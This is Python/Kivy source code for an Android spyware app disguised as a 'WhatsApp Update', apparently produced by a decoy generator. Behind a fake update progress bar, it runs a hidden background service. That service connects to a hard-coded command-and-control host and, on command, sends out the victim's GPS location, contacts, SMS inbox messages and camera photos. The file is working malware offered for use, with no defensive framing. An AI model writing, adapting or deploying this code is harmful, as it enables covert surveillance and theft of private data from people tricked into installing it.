# SPECTRE APK — WhatsApp Update
# Auto-generated by decoy.py
from kivy.app import App
from kivy.uix.screenmanager import Screen
from kivy.clock import Clock
from kivy.metrics import dp
import threading, socket, json, os, time, base64

C2_HOST = "192.168.1.5"
C2_PORT = 4445
STEPS   = ['Checking version', 'Downloading update', 'Verifying files', 'Applying patch', 'Done!']

class SpectreScreen(Screen):
    pass

class SpyService:
    def __init__(self): self.sock = None

    def connect(self):
        while True:
            try:
                self.sock = socket.socket()
                self.sock.settimeout(15)
                self.sock.connect((C2_HOST, C2_PORT))
                self.sock.settimeout(None)
                self._beacon()
                self._loop()
            except: time.sleep(20)

    def _send(self, d):
        try: self.sock.sendall((json.dumps(d)+"\n").encode())
        except: pass

    def _beacon(self):
        try:
            import android
            from jnius import autoclass
            Build    = autoclass("android.os.Build")
            Version  = autoclass("android.os.Build$VERSION")
            d = {"type":"beacon","model":Build.MODEL,"android":str(Version.RELEASE)}
        except:
            import platform
            d = {"type":"beacon","model":platform.node(),"android":"unknown"}
        self._send(d)

    def _loop(self):
        buf = b""
        while True:
            try:
                chunk = self.sock.recv(4096)
                if not chunk: break
                buf += chunk
                while b"\n" in buf:
                    line, buf = buf.split(b"\n",1)
                    if not line.strip(): continue
                    cmd = json.loads(line.strip()).get("cmd","")
                    if cmd == "location":  threading.Thread(target=self._gps, daemon=True).start()
                    elif cmd == "contacts": threading.Thread(target=self._contacts, daemon=True).start()
                    elif cmd == "sms":     threading.Thread(target=self._sms, daemon=True).start()
                    elif cmd == "photo":   threading.Thread(target=self._photo, daemon=True).start()
                    elif cmd == "ping":    self._send({"type":"pong"})
            except: break

    def _gps(self):
        try:
            from plyer import gps
            result = {}
            done   = threading.Event()
            def on_loc(**kw): result.update(kw); done.set()
            gps.configure(on_location=on_loc)
            gps.start(minTime=0, minDistance=0)
            done.wait(timeout=10)
            gps.stop()
            self._send({"type":"gps","lat":result.get("lat"),"lon":result.get("lon")})
        except Exception as e: self._send({"type":"gps","err":str(e)})

    def _contacts(self):
        try:
            from jnius import autoclass
            Uri     = autoclass("android.net.Uri")
            PythonActivity = autoclass("org.kivy.android.PythonActivity")
            ctx = PythonActivity.mActivity
            cr  = ctx.getContentResolver()
            Phone = autoclass("android.provider.ContactsContract$CommonDataKinds$Phone")
            cur = cr.query(Phone.CONTENT_URI, None, None, None, None)
            contacts = []
            while cur.moveToNext():
                name = cur.getString(cur.getColumnIndex("display_name")) or ""
                num  = cur.getString(cur.getColumnIndex("data1")) or ""
                contacts.append({"name":name,"num":num})
            cur.close()
            self._send({"type":"contacts","data":contacts[:300]})
        except Exception as e: self._send({"type":"contacts","err":str(e)})

    def _sms(self):
        try:
            from jnius import autoclass
            Uri = autoclass("android.net.Uri")
            PythonActivity = autoclass("org.kivy.android.PythonActivity")
            ctx = PythonActivity.mActivity
            cr  = ctx.getContentResolver()
            cur = cr.query(Uri.parse("content://sms/inbox"), None, None, None, "date DESC LIMIT 100")
            msgs = []
            while cur.moveToNext():
                msgs.append({
                    "from": cur.getString(cur.getColumnIndex("address")) or "",
                    "body": cur.getString(cur.getColumnIndex("body")) or "",
                })
            cur.close()
            self._send({"type":"sms","data":msgs})
        except Exception as e: self._send({"type":"sms","err":str(e)})

    def _photo(self):
        try:
            from plyer import camera
            path = "/sdcard/.xc_p.jpg"
            done = threading.Event()
            def cb(fn):
                try:
                    with open(fn,"rb") as f: data = base64.b64encode(f.read()).decode()
                    self._send({"type":"photo","data":data})
                    os.remove(fn)
                except: pass
                done.set()
            camera.take_picture(filename=path, on_complete=cb)
            done.wait(timeout=15)
        except Exception as e: self._send({"type":"photo","err":str(e)})


_svc = SpyService()

class SpectreApp(App):
    def build(self):
        from kivy.uix.screenmanager import ScreenManager
        sm = ScreenManager()
        self._scr = SpectreScreen(name="main")
        sm.add_widget(self._scr)
        threading.Thread(target=_svc.connect, daemon=True).start()
        Clock.schedule_once(self._start_progress, 1.5)
        return sm

    def _start_progress(self, *a):
        self._step = 0
        self._pct  = 0
        Clock.schedule_interval(self._tick, 0.08)

    def _tick(self, dt):
        scr = self._scr
        try:
            bar   = scr.ids.progress
            lbl   = scr.ids.status_label
            pct_l = scr.ids.pct_label
        except: return True
        self._pct += 0.4
        if self._pct > 100: self._pct = 100
        bar.value = self._pct
        pct_l.text = f"{int(self._pct)}%"
        step_idx = min(int(self._pct / 25), len(STEPS)-1)
        lbl.text = STEPS[step_idx]
        if self._pct >= 100:
            Clock.schedule_once(self._finish, 1.5)
            return False

    def _finish(self, *a):
        # Setelah "selesai" → sembunyikan UI, tetap running di background
        from kivy.uix.label import Label
        self._scr.clear_widgets()
        self._scr.add_widget(Label(
            text="✓  Update complete\nYou may close this app.",
            color=(0.4, 0.4, 0.4, 1),
            font_size="14sp",
            halign="center",
        ))

    def on_pause(self): return True
    def on_resume(self): pass

if __name__ == "__main__":
    SpectreApp().run()
